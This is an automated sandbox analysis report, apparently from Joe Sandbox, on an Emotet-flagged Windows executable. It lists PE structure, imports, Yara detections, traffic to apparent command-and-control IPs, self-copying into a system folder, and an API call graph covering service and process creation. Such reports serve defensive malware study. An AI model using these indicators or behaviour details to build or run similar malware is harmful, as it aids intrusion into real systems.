                                                                                                    .text0x10000x2a1d10x2a200False0.40440699184data5.8183204417IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x2c0000x8c7c0x8e00False0.263011663732data3.37323787881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x350000x3c200x1a00False0.244891826923data2.84139335758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                    .idata0x390000xfb90x1000False0.3642578125data4.6782022268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x3a0000x13d100x13e00False0.767614976415data6.94887089309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x4e0000x207f0x2200False0.650620404412data5.98371531894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_BITMAP0x493780x1244dataEnglishUnited States
                                                                                                    RT_ICON0x3a3b00x2e8dataEnglishUnited States
                                                                                                    RT_ICON0x3a6980x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                    RT_MENU0x493200x54dataEnglishUnited States
                                                                                                    RT_STRING0x4a5c00xbcdataEnglishUnited States
                                                                                                    RT_GROUP_ICON0x3a7c00x22dataEnglishUnited States
                                                                                                    RT_MANIFEST0x4a6800x17dXML 1.0 document textEnglishUnited States
                                                                                                    None0x3a7e80xeb33dataEnglishUnited States

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    KERNEL32.dllSetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapReAlloc, WriteConsoleW, OutputDebugStringW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, LoadLibraryExW, FreeLibrary, SetConsoleCtrlHandler, FatalAppExitA, LeaveCriticalSection, EnterCriticalSection, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, CloseHandle, LoadLibraryA, GetProcAddress, VirtualAlloc, HeapSize, GetLocalTime, HeapAlloc, RtlUnwind, GetCommandLineA, GetLastError, HeapFree, IsDebuggerPresent, IsProcessorFeaturePresent, EncodePointer, DecodePointer, RaiseException, ExitProcess, GetModuleHandleExW, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, SetLastError, GetCurrentThread, GetCurrentThreadId, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, CreateFileW
                                                                                                    USER32.dllLoadIconA, LoadCursorA, MessageBoxA, EndPaint, BeginPaint, UpdateWindow, TranslateAcceleratorA, LoadAcceleratorsA, ShowWindow, RegisterClassExA, PostQuitMessage, DispatchMessageA, TranslateMessage, GetMessageA, LoadStringA, LoadBitmapA, GetDesktopWindow, SetWindowLongA, GetWindowLongA, GetCursorPos, GetWindowRect, ReleaseDC, GetDC, TrackPopupMenu, GetSubMenu, CheckMenuItem, LoadMenuA, KillTimer, SetTimer, SetWindowPos, DestroyWindow, CreateWindowExA, DefWindowProcA
                                                                                                    GDI32.dllSelectObject, DeleteObject, DeleteDC, CreateCompatibleDC, BitBlt, StretchBlt

                                                                                                    Exports

                                                                                                    NameOrdinalAddress
                                                                                                    lhxXfY9mIrDZ10x40103c

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Snort IDS Alerts

                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    09/29/21-04:15:05.886157ICMP399ICMP Destination Unreachable Host Unreachable108.167.150.86192.168.2.5
                                                                                                    09/29/21-04:15:08.898226ICMP399ICMP Destination Unreachable Host Unreachable108.167.150.86192.168.2.5
                                                                                                    09/29/21-04:15:14.914137ICMP399ICMP Destination Unreachable Host Unreachable108.167.150.86192.168.2.5

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Sep 29, 2021 04:14:34.579462051 CEST4973680192.168.2.5190.191.171.72
                                                                                                    Sep 29, 2021 04:14:37.590918064 CEST4973680192.168.2.5190.191.171.72
                                                                                                    Sep 29, 2021 04:14:43.591281891 CEST4973680192.168.2.5190.191.171.72
                                                                                                    Sep 29, 2021 04:14:58.564569950 CEST497458080192.168.2.55.189.168.53
                                                                                                    Sep 29, 2021 04:14:58.596065044 CEST8080497455.189.168.53192.168.2.5
                                                                                                    Sep 29, 2021 04:14:59.108776093 CEST497458080192.168.2.55.189.168.53
                                                                                                    Sep 29, 2021 04:14:59.141755104 CEST8080497455.189.168.53192.168.2.5
                                                                                                    Sep 29, 2021 04:14:59.655216932 CEST497458080192.168.2.55.189.168.53
                                                                                                    Sep 29, 2021 04:14:59.685148001 CEST8080497455.189.168.53192.168.2.5
                                                                                                    Sep 29, 2021 04:15:02.749850988 CEST497517080192.168.2.5162.241.41.111
                                                                                                    Sep 29, 2021 04:15:05.765048027 CEST497517080192.168.2.5162.241.41.111
                                                                                                    Sep 29, 2021 04:15:11.781199932 CEST497517080192.168.2.5162.241.41.111
                                                                                                    Sep 29, 2021 04:15:27.074985027 CEST497857080192.168.2.5190.85.46.52
                                                                                                    Sep 29, 2021 04:15:30.079667091 CEST497857080192.168.2.5190.85.46.52
                                                                                                    Sep 29, 2021 04:15:36.080301046 CEST497857080192.168.2.5190.85.46.52
                                                                                                    Sep 29, 2021 04:15:51.844423056 CEST497907080192.168.2.537.205.9.252
                                                                                                    Sep 29, 2021 04:15:54.847382069 CEST497907080192.168.2.537.205.9.252
                                                                                                    Sep 29, 2021 04:16:00.847948074 CEST497907080192.168.2.537.205.9.252
                                                                                                    Sep 29, 2021 04:16:15.304163933 CEST497938080192.168.2.5172.96.190.154
                                                                                                    Sep 29, 2021 04:16:15.472785950 CEST808049793172.96.190.154192.168.2.5
                                                                                                    Sep 29, 2021 04:16:15.974430084 CEST497938080192.168.2.5172.96.190.154
                                                                                                    Sep 29, 2021 04:16:16.143085957 CEST808049793172.96.190.154192.168.2.5
                                                                                                    Sep 29, 2021 04:16:16.646538019 CEST497938080192.168.2.5172.96.190.154
                                                                                                    Sep 29, 2021 04:16:16.815198898 CEST808049793172.96.190.154192.168.2.5

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Sep 29, 2021 04:14:05.641190052 CEST6206053192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:14:05.662507057 CEST53620608.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:14:19.959433079 CEST6180553192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:14:19.976883888 CEST53618058.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:14:37.067980051 CEST5479553192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:14:37.104115963 CEST53547958.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:14:56.899835110 CEST4955753192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:14:56.932769060 CEST53495578.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:12.343552113 CEST6173353192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:12.354193926 CEST6544753192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:12.374015093 CEST53654478.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:12.379074097 CEST53617338.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:15.998997927 CEST5244153192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:16.018075943 CEST53524418.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:27.754755020 CEST6217653192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:27.780180931 CEST53621768.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:28.400073051 CEST5959653192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:28.419282913 CEST53595968.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:50.121165037 CEST6529653192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:50.153857946 CEST53652968.8.8.8192.168.2.5
                                                                                                    Sep 29, 2021 04:15:51.985894918 CEST6318353192.168.2.58.8.8.8
                                                                                                    Sep 29, 2021 04:15:52.013561010 CEST53631838.8.8.8192.168.2.5

                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:04:14:12
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Users\user\Desktop\RpcNs4.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\Desktop\RpcNs4.exe'
                                                                                                    Imagebase:0x400000
                                                                                                    File size:310784 bytes
                                                                                                    MD5 hash:1ED37C4A225BBD35716CF241E14541A8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.256801219.00000000005F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.256746048.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:04:14:14
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\SysWOW64\rasphone\networkitemfactory.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\rasphone\networkitemfactory.exe
                                                                                                    Imagebase:0x400000
                                                                                                    File size:310784 bytes
                                                                                                    MD5 hash:1ED37C4A225BBD35716CF241E14541A8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.517659433.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.519022380.0000000002094000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:04:14:16
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:20
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:26
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:27
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:28
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:29
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:30
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                    Imagebase:0x7ff6ee970000
                                                                                                    File size:163336 bytes
                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:04:14:30
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:04:14:36
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:04:14:46
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff797770000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:04:15:31
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                    Imagebase:0x7ff71de40000
                                                                                                    File size:455656 bytes
                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    General

                                                                                                    Start time:04:15:32
                                                                                                    Start date:29/09/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.6%
                                                                                                      Dynamic/Decrypted Code Coverage:53.1%
                                                                                                      Signature Coverage:15.8%
                                                                                                      Total number of Nodes:424
                                                                                                      Total number of Limit Nodes:38

                                                                                                      Graph

                                                                                                      execution_graph 21407 402000 21408 402015 21407->21408 21409 40203c 21408->21409 21410 40202a GetProcAddress 21408->21410 21411 402085 LoadStringA LoadStringA LoadStringA 21409->21411 21412 40205e VirtualAlloc 21409->21412 21410->21409 21415 4020bd 21411->21415 21412->21411 21413 402077 21412->21413 21424 402190 21413->21424 21416 4020d6 LoadAcceleratorsA GetMessageA 21415->21416 21417 4020cd 21415->21417 21418 402134 21416->21418 21419 4020f8 21416->21419 21420 402104 TranslateAcceleratorA 21419->21420 21421 402124 GetMessageA 21420->21421 21422 402118 TranslateMessage DispatchMessageA 21420->21422 21421->21418 21421->21420 21422->21421 21431 4025d7 21424->21431 21427 4025d7 _malloc 58 API calls 21430 4021ad 21427->21430 21428 4022a9 21428->21411 21429 402246 ShowWindow 21429->21428 21429->21430 21430->21428 21430->21429 21432 402652 21431->21432 21440 4025e3 21431->21440 21454 4036e7 DecodePointer 21432->21454 21434 402658 21455 403fac 58 API calls __getptd_noexit 21434->21455 21437 402616 RtlAllocateHeap 21438 4021a5 21437->21438 21437->21440 21438->21427 21440->21437 21441 40263e 21440->21441 21442 4025ee 21440->21442 21446 40263c 21440->21446 21451 4036e7 DecodePointer 21440->21451 21452 403fac 58 API calls __getptd_noexit 21441->21452 21442->21440 21448 403d5e 58 API calls __NMSG_WRITE 21442->21448 21449 403dbb 58 API calls 7 library calls 21442->21449 21450 403918 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 21442->21450 21453 403fac 58 API calls __getptd_noexit 21446->21453 21448->21442 21449->21442 21451->21440 21452->21446 21453->21438 21454->21434 21455->21438 21456 401880 21457 4025d7 _malloc 58 API calls 21456->21457 21458 4018d8 21457->21458 21458->21458 21459 4018ed LoadLibraryA GetProcAddress 21458->21459 21460 40191c 21459->21460 21461 401920 21460->21461 21462 40192f 21460->21462 21467 4023ff 6 API calls ___raise_securityfailure 21461->21467 21468 4023ff 6 API calls ___raise_securityfailure 21462->21468 21464 40192b 21466 40194e 21467->21464 21468->21466 21469 20b9719 21482 20b9720 21469->21482 21470 20b9982 21472 20b99a1 21470->21472 21495 20b3e70 GetPEB 21470->21495 21497 20b3000 FindFirstFileW FindNextFileW FindClose GetPEB 21472->21497 21473 20b97c9 OpenSCManagerW 21473->21482 21475 20b3dd0 GetPEB 21475->21482 21476 20b3e70 GetPEB 21476->21482 21477 20b9995 21496 20b3dd0 GetPEB 21477->21496 21481 20b980f 21482->21470 21482->21473 21482->21475 21482->21476 21482->21481 21483 20b4220 21482->21483 21494 20b7c20 GetPEB 21482->21494 21484 20b4243 21483->21484 21485 20b422d 21483->21485 21489 20b4270 RtlAllocateHeap 21484->21489 21500 20b3e70 GetPEB 21484->21500 21498 20b3e70 GetPEB 21485->21498 21487 20b4237 21499 20b3dd0 GetPEB 21487->21499 21489->21482 21491 20b425f 21501 20b3dd0 GetPEB 21491->21501 21493 20b426b 21493->21489 21494->21482 21495->21477 21496->21472 21497->21481 21498->21487 21499->21484 21500->21491 21501->21493 21502 20b5c10 21510 20b64f0 21502->21510 21504 20b5c15 21505 20b5c39 ExitProcess 21504->21505 21555 20b3e70 GetPEB 21504->21555 21507 20b5c28 21556 20b3dd0 GetPEB 21507->21556 21509 20b5c34 21509->21505 21534 20b650d 21510->21534 21514 20b6ffb 21625 20b8c00 GetPEB CreateProcessW 21514->21625 21516 20b6789 21516->21504 21518 20b6fee 21624 20b8600 GetPEB 21518->21624 21527 20b4180 GetPEB 21527->21534 21531 20b6ff3 21531->21504 21534->21514 21534->21516 21534->21518 21534->21527 21535 20b66db 21534->21535 21537 20b68ae 21534->21537 21538 20b6d67 GetTickCount 21534->21538 21546 20b3e70 GetPEB 21534->21546 21552 20b3dd0 GetPEB 21534->21552 21553 20b40c0 GetPEB 21534->21553 21557 20b8330 21534->21557 21563 20b8a70 21534->21563 21573 20b8830 21534->21573 21585 20b8060 21534->21585 21599 20b9700 6 API calls 21534->21599 21600 20b70b0 GetPEB LoadLibraryW 21534->21600 21601 20b8f10 GetPEB 21534->21601 21602 20b46d0 GetPEB GetCurrentProcessId 21534->21602 21603 20bb090 GetPEB RtlAllocateHeap 21534->21603 21604 20b32b0 GetPEB 21534->21604 21605 20b1820 GetPEB 21534->21605 21606 20b3400 GetPEB 21534->21606 21607 20b8d40 GetPEB 21534->21607 21609 20b9ed0 GetPEB 21534->21609 21611 20b73b0 GetPEB RtlAllocateHeap 21534->21611 21612 20b5fa0 GetPEB 21534->21612 21613 20b7270 GetPEB 21534->21613 21614 20b5300 GetPEB 21534->21614 21615 20b12b0 _snwprintf GetPEB RtlAllocateHeap 21534->21615 21618 20bb290 GetPEB RtlAllocateHeap GetCurrentProcessId CreateProcessW 21534->21618 21619 20b9d90 GetPEB 21534->21619 21620 20b9140 GetPEB 21534->21620 21621 20b9340 GetPEB 21534->21621 21622 20baea0 GetPEB 21534->21622 21623 20b6120 GetPEB 21534->21623 21608 20bb140 GetPEB 21535->21608 21537->21534 21537->21538 21610 20b94c0 GetPEB GetTickCount GetCurrentProcessId _snwprintf 21537->21610 21616 20b3e70 GetPEB 21537->21616 21617 20b3dd0 GetPEB 21537->21617 21538->21534 21546->21534 21547 20b66e0 21547->21504 21552->21534 21553->21534 21555->21507 21556->21509 21561 20b83b0 21557->21561 21558 20b848a 21558->21534 21559 20b3e70 GetPEB 21559->21561 21560 20b84cd CreateFileW 21560->21558 21560->21561 21561->21558 21561->21559 21561->21560 21562 20b3dd0 GetPEB 21561->21562 21562->21561 21572 20b8a84 21563->21572 21564 20b8bea 21652 20b3650 21564->21652 21566 20b8bd3 21566->21534 21567 20b8bf3 21567->21534 21570 20b3dd0 GetPEB 21570->21572 21571 20b3e70 GetPEB 21571->21572 21572->21564 21572->21566 21572->21570 21572->21571 21626 20b3720 21572->21626 21672 20b3460 21572->21672 21583 20b8851 21573->21583 21574 20b8a38 21577 20b89bb 21574->21577 21717 20b3e70 GetPEB 21574->21717 21577->21534 21578 20b8a4b 21718 20b3dd0 GetPEB 21578->21718 21579 20b3460 GetPEB 21579->21583 21580 20b3e70 GetPEB 21580->21583 21582 20b3dd0 GetPEB 21582->21583 21583->21574 21583->21577 21583->21579 21583->21580 21583->21582 21706 20b4fb0 21583->21706 21716 20b3400 GetPEB 21583->21716 21593 20b80e2 21585->21593 21586 20b82c5 CreateFileW 21586->21593 21596 20b8314 21586->21596 21587 20b8282 SetFileInformationByHandle 21587->21593 21588 20b82f5 21588->21596 21721 20b3e70 GetPEB 21588->21721 21589 20b3e70 GetPEB 21589->21593 21590 20b8221 21590->21534 21592 20b3460 GetPEB 21592->21593 21593->21586 21593->21587 21593->21588 21593->21589 21593->21590 21593->21592 21597 20b3dd0 GetPEB 21593->21597 21720 20b3400 GetPEB 21593->21720 21594 20b8308 21722 20b3dd0 GetPEB 21594->21722 21596->21534 21597->21593 21599->21534 21600->21534 21601->21534 21602->21534 21603->21534 21604->21534 21605->21534 21606->21534 21607->21534 21608->21547 21609->21534 21610->21537 21611->21534 21612->21534 21613->21534 21614->21534 21615->21534 21616->21537 21617->21537 21618->21534 21619->21534 21620->21534 21621->21534 21622->21534 21623->21534 21624->21531 21625->21516 21627 20b3735 21626->21627 21630 20b374b 21626->21630 21682 20b3e70 GetPEB 21627->21682 21629 20b373f 21683 20b3dd0 GetPEB 21629->21683 21634 20b377d 21630->21634 21684 20b3e70 GetPEB 21630->21684 21633 20b3771 21685 20b3dd0 GetPEB 21633->21685 21636 20b37b2 21634->21636 21686 20b3e70 GetPEB 21634->21686 21639 20b37ea 21636->21639 21688 20b3e70 GetPEB 21636->21688 21638 20b37a6 21687 20b3dd0 GetPEB 21638->21687 21644 20b3816 21639->21644 21690 20b3e70 GetPEB 21639->21690 21642 20b37de 21689 20b3dd0 GetPEB 21642->21689 21647 20b386c 21644->21647 21692 20b3e70 GetPEB 21644->21692 21646 20b380a 21691 20b3dd0 GetPEB 21646->21691 21647->21572 21650 20b3860 21693 20b3dd0 GetPEB 21650->21693 21653 20b3460 GetPEB 21652->21653 21654 20b3664 21653->21654 21655 20b3685 21654->21655 21694 20b3e70 GetPEB 21654->21694 21658 20b36ba 21655->21658 21696 20b3e70 GetPEB 21655->21696 21657 20b3679 21695 20b3dd0 GetPEB 21657->21695 21665 20b36e2 21658->21665 21698 20b3e70 GetPEB 21658->21698 21661 20b36ae 21697 20b3dd0 GetPEB 21661->21697 21664 20b36d6 21699 20b3dd0 GetPEB 21664->21699 21666 20b3713 DeleteFileW 21665->21666 21700 20b3e70 GetPEB 21665->21700 21666->21567 21669 20b3702 21701 20b3dd0 GetPEB 21669->21701 21671 20b370e 21671->21666 21673 20b3483 21672->21673 21674 20b34a8 21673->21674 21702 20b3e70 GetPEB 21673->21702 21681 20b34d0 21674->21681 21704 20b3e70 GetPEB 21674->21704 21676 20b349c 21703 20b3dd0 GetPEB 21676->21703 21679 20b34c4 21705 20b3dd0 GetPEB 21679->21705 21681->21572 21682->21629 21683->21630 21684->21633 21685->21634 21686->21638 21687->21636 21688->21642 21689->21639 21690->21646 21691->21644 21692->21650 21693->21647 21694->21657 21695->21655 21696->21661 21697->21658 21698->21664 21699->21665 21700->21669 21701->21671 21702->21676 21703->21674 21704->21679 21705->21681 21708 20b4fcc 21706->21708 21707 20b52e9 21707->21583 21708->21707 21709 20b52e2 21708->21709 21710 20b524e OpenServiceW 21708->21710 21712 20b4220 2 API calls 21708->21712 21713 20b5088 RtlAllocateHeap 21708->21713 21714 20b3e70 GetPEB 21708->21714 21715 20b3dd0 GetPEB 21708->21715 21719 20b4180 GetPEB 21709->21719 21710->21708 21712->21708 21713->21708 21714->21708 21715->21708 21716->21583 21717->21578 21718->21577 21719->21707 21720->21593 21721->21594 21722->21596 21723 20b7010 21724 20b3460 GetPEB 21723->21724 21725 20b7019 21724->21725 21726 20b703f LoadLibraryW 21725->21726 21740 20b3e70 GetPEB 21725->21740 21728 20b706b 21726->21728 21729 20b7055 21726->21729 21735 20b7093 21728->21735 21744 20b3e70 GetPEB 21728->21744 21742 20b3e70 GetPEB 21729->21742 21731 20b702e 21741 20b3dd0 GetPEB 21731->21741 21732 20b705f 21743 20b3dd0 GetPEB 21732->21743 21736 20b703a 21736->21726 21738 20b7087 21745 20b3dd0 GetPEB 21738->21745 21740->21731 21741->21736 21742->21732 21743->21728 21744->21738 21745->21735 21746 20b3060 21750 20b307a 21746->21750 21747 20b3e70 GetPEB 21747->21750 21748 20b3255 21749 20b3196 21748->21749 21756 20b3e70 GetPEB 21748->21756 21750->21747 21750->21748 21750->21749 21751 20b3dd0 GetPEB 21750->21751 21754 20b310b RtlAllocateHeap 21750->21754 21751->21750 21753 20b3269 21757 20b3dd0 GetPEB 21753->21757 21754->21749 21754->21750 21756->21753 21757->21749 21758 20b4ae0 21759 20b4b08 21758->21759 21760 20b4af2 21758->21760 21764 20b4b47 CreateProcessW 21759->21764 21782 20b3e70 GetPEB 21759->21782 21780 20b3e70 GetPEB 21760->21780 21762 20b4afc 21781 20b3dd0 GetPEB 21762->21781 21765 20b4be3 21764->21765 21766 20b4b67 21764->21766 21769 20b4b6f 21766->21769 21774 20b4ba3 21766->21774 21784 20b3e70 GetPEB 21766->21784 21768 20b4b36 21783 20b3dd0 